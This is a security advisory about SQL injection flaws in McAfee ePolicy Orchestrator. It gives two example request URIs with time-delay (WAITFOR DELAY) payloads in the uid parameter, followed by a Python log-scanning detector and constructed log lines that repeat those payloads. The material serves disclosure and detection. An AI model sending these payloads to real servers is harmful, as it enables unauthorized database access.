McAfee ePolicy Orchestrator Multiple SQL Injection Vulnerabilities

An attacker can exploit this issue using a web browser.

The following example URIs are available:

http://www.example.com/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid= 6waitf or%20delay'0%3a0%3a20'-- &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax Mode=standard HTTP/1.1

http://www.example.com/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2&index=0 HTTP/1.1
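
For detection, the check below is an added example (not part of the original advisory or any McAfee tooling) that scans web access logs for requests to the two endpoints above whose uid parameter carries a WAITFOR DELAY payload or any non-numeric value. The log lines are constructed, and treating uid as a numeric-only field is an assumption drawn from the example URIs.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoints and parameter taken from the advisory's example URIs.
ENDPOINTS = ("/core/showRegisteredTypeDetails.do",
             "/EPOAGENTMETA/DisplayMSAPropsDetail.do")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DELAY_RE = re.compile(r"waitfor\s*delay", re.IGNORECASE)

def query_params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def classify(log_line):
    """Return None, 'non-numeric-uid' or 'time-delay-sqli' for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if target.path not in ENDPOINTS:
        return None
    verdict = None
    for value in query_params(target.query).get("uid", []):
        if DELAY_RE.search(value):
            return "time-delay-sqli"
        if not value.strip().isdigit():  # assumption: a legitimate uid is numeric
            verdict = "non-numeric-uid"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, verdict) for n, verdict in hits if verdict]

# Constructed access-log lines, modelled on the example URIs (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6&index=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitfor%20delay\'0%3a0%3a20\'--&index=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2010:10:00:30 +0000] "GET /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer&uid=1;%20WAITFOR%20DELAY%20\'0:0:0\';--&index=0 HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2010:10:01:00 +0000] "GET /core/showRegisteredTypeDetails.do?uid=abc&index=0 HTTP/1.1" 500 310',
    '192.0.2.12 - - [01/Jan/2010:10:02:00 +0000] "GET /other/page.do?uid=waitfor%20delay HTTP/1.1" 404 120',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Correlating flagged requests with response times close to the requested delay helps separate probing from injection that actually reached the database.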

Copyright 2010, SecurityFocus